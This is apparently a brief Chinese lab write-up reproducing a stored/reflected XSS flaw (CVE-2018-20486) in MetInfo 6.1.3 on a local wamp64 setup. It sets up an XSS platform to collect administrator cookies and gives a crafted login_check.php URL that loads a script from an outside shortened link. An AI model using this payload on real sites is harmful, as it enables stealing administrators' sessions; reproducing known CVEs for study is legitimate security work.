一、环境准备
1.1 环境
Web环境:wamp64
MetInfo版本:6.1.3
1.2 漏洞概述
漏洞类型:XSS漏洞
危险等级:中
CVE编号:CVE-2018-20486
1.3 xss平台
在xss平台上注册一个账号,并创建一个默认模块。
用于接收管理员cookie
二、漏洞复现
2.1
通过构造URL触发漏洞,并将xss平台的代码插入其中
127.0.0.1/test/admin/login/login_check.php?url_array[]=<script src=https://t.cn/E9E5224></script>&url_array[]=a
访问该链接返回如下结果表示插入成功
2.2
管理员登录